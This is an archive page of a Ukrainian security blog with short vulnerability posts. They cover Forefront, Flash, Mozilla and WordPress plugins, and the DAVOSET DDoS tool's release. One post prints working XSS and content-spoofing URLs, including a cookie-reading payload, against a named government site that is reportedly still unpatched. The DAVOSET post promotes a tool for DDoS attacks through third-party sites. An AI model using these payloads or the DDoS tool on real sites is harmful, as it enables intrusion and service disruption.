Виявлена можливість виконання коду в Microsoft Forefront Protection for Exchange.
Уразливі версії: Microsoft Forefront Protection 2010 for Exchange Server.
Виконання коду при розборі листа.
Продовжуючи розпочату традицію, після попереднього відео про DoS експлоіт для WordPress, пропоную нове відео на веб секюріті тематику. Цього разу відео про виконання коду в Adobe Flash Player. Рекомендую подивитися всім хто цікавиться цією темою.
CVE-2012-0779 APSB12-09 Adobe Flash Player Vulnerability Metasploit Demo
В даному відео ролику демонструється використання експлоіта для проведення атаки на уразливість в Adobe Flash Player 11.2. Який призводить до віддаленого виконання коду в браузері з Flash плагіном (показано на прикладі браузера IE6) при відкритті сторінки з кодом експлоіту. Що дозволяє нападнику отримати контроль над атакованим комп’ютером.
Атака відбувається при відвідуванні в браузері з флеш плагіном спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.
30.10.2013
У жовтні, 27.10.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості на сайті Держмолодьспорту - http://dsmsu.gov.ua. Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно державних сайтів в останнє я писав про уразливості на nrcu.gov.ua та www.bank.gov.ua.
Детальна інформація про уразливості з’явиться пізніше.
14.02.2014
Уразливості в JW Player я описав в попередні роки.
XSS:
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpgТа інші XSS уразливості в JW Player.
Content Spoofing:
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg
Та інші CS уразливості в JW Player.
На сайті є й інші дірки, про які я повідомив адмінам та розробникам движка, що розробляли сайт. Дані уразливості досі не виправлені.
Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.
Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey.
Уразливі продукти: Mozilla Firefox 26.0, Firefox ESR 24.2, Thunderbird 24.2, Seamonkey 2.23.
Численні пошкодження пам’яті, міжсайтовий скриптінг, DoS, витік інформації.
Сьогодні вийшла нова версія програми DAVOSET v.1.1.7. Це випуск нової надії - New Hope Edition. В новій версії:
Всього в списку міститься 151 зомбі-сервіс, які готові нанести удар по сайтам злочинного режиму.
DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.
Скачати: DAVOSET_v.1.1.7.rar.
В даній добірці уразливості в веб додатках:
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Highlight Premium Theme, Make A Statement та Tweet Blender. Для котрих з’явилися експлоіти. Highlight Premium Theme - це тема движка, Make A Statement - це тема движка, Tweet Blender - це плагін для розміщення на сайті повідомлень з Twitter.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
Нещодавно, 5 і 6 лютого, вийшли PHP 5.4.25 і PHP 5.5.9 відповідно. У версії 5.5.9 виправлено декілька багів, а у версії 5.4.25 виправлено 5 багів. Дані релізи направлені на покращення стабільності гілок 5.4.x і 5.5.x.
Жодних уразливостей в цих версіях PHP виправлено не було.
По матеріалам http://www.php.net.
В даній добірці експлоіти в веб додатках:
* 
You are currently browsing the archives for Лютий, 2014.
Copyright © 2006-2025 MustLive. Усі права захищені.
Партнер проекту Websecurity.com.ua - веб проект mlfun.org.ua.